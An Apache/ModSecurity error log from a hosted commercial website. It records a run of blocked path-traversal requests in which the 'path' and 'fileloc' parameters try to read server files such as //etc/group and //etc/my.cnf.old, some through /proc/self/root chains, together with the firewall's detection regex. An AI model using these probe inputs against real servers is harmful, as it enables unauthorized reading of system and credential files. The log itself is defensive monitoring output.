[Thu Mar 19 11:46:20.371308 2026] [:error] [pid 27403:tid 140411624429312] [client 57.141.18.4:37812] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMPBkFeYa1D6dYQnD3RwAAAc4"]
[Thu Mar 19 11:46:21.019302 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:47084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMPda6ubjKNq_cu4Zb3gAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:21.019765 2026] [mime_magic:error] [pid 26799:tid 140411574073088] (70014)End of file found: [client 74.7.241.31:47084] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:21.370598 2026] [:error] [pid 17887:tid 140411607643904] [client 57.141.18.11:37826] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMPQkwaGbbGflqUZDKFAAAANA"]
[Thu Mar 19 11:46:21.654659 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:55966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMPV_V7PWP6ixUYl7DZAAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:21.922821 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:47090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMPQbLMZ6AikZjR9Vj5AAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:22.761163 2026] [:error] [pid 17887:tid 140411691570944] [client 57.141.18.75:37818] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMPgkwaGbbGflqUZDKFgAAAMY"]
[Thu Mar 19 11:46:23.238255 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.241.31:47104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMP_-YZRR_7pZ7nDKSOwAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:23.690935 2026] [:error] [pid 27293:tid 140411733534464] [client 57.141.18.122:37860] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMP_-YZRR_7pZ7nDKSPAAAA8E"]
[Thu Mar 19 11:46:24.282018 2026] [:error] [pid 14269:tid 140411548894976] [client 57.141.18.68:37846] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMQAbLMZ6AikZjR9Vj5gAAABc"]
[Thu Mar 19 11:46:24.964414 2026] [:error] [pid 27403:tid 140411582465792] [client 57.141.18.99:37886] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMQBkFeYa1D6dYQnD3SQAAAdM"]
[Thu Mar 19 11:46:25.531534 2026] [:error] [pid 27293:tid 140411607643904] [client 57.141.18.10:37900] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMQf-YZRR_7pZ7nDKSPQAAA9A"]
[Thu Mar 19 11:46:25.683817 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:47120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMQfu8EFLIOrSqIpuuBgAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:25.754029 2026] [:error] [pid 31803:tid 140411574073088] [client 57.141.18.75:37906] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMQeyqAr6etmhZHNpm5AAAAFQ"]
[Thu Mar 19 11:46:26.618027 2026] [:error] [pid 17653:tid 140411741927168] [client 57.141.18.59:37884] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMQsdf6f5d65gmYZR-cgAAAsA"]
[Thu Mar 19 11:46:28.323495 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.11:37962] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMROoXxyEfFpUF8f8UYQAAAUE"]
[Thu Mar 19 11:46:28.604278 2026] [:error] [pid 17887:tid 140411708356352] [client 57.141.18.58:37940] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMRAkwaGbbGflqUZDKGQAAAMQ"]
[Thu Mar 19 11:46:29.159973 2026] [:error] [pid 30077:tid 140411683178240] [client 57.141.18.21:37976] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMRfu8EFLIOrSqIpuuCQAAAkc"]
[Thu Mar 19 11:46:29.764677 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.83:37992] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMRf-YZRR_7pZ7nDKSPwAAA8k"]
[Thu Mar 19 11:46:30.235605 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.25:38000] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMRuoXxyEfFpUF8f8UYgAAAVg"]
[Thu Mar 19 11:46:32.245111 2026] [:error] [pid 27403:tid 140411574073088] [client 57.141.18.62:38056] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMSBkFeYa1D6dYQnD3UAAAAdQ"]
[Thu Mar 19 11:46:34.054984 2026] [:error] [pid 27403:tid 140411590858496] [client 57.141.18.118:38044] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMShkFeYa1D6dYQnD3UgAAAdI"]
[Thu Mar 19 11:46:36.125824 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36120] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:46:36.444539 2026] [:error] [pid 27403:tid 140411557287680] [client 57.141.18.5:38130] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMTBkFeYa1D6dYQnD3VQAAAdY"]
[Thu Mar 19 11:46:37.483572 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.37:38052] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMTQbLMZ6AikZjR9Vj7wAAAAg"]
[Thu Mar 19 11:46:39.426286 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.244.43:46160] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwMThkFeYa1D6dYQnD3WgAAAdA"]
[Thu Mar 19 11:46:41.103047 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.1:38212] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMUeoXxyEfFpUF8f8UZAAAAVQ"]
[Thu Mar 19 11:46:41.332820 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.123:38128] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMUf-YZRR_7pZ7nDKSRAAAA8c"]
[Thu Mar 19 11:46:44.983977 2026] [:error] [pid 27293:tid 140411632822016] [client 57.141.18.63:38286] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMVP-YZRR_7pZ7nDKSRQAAA80"]
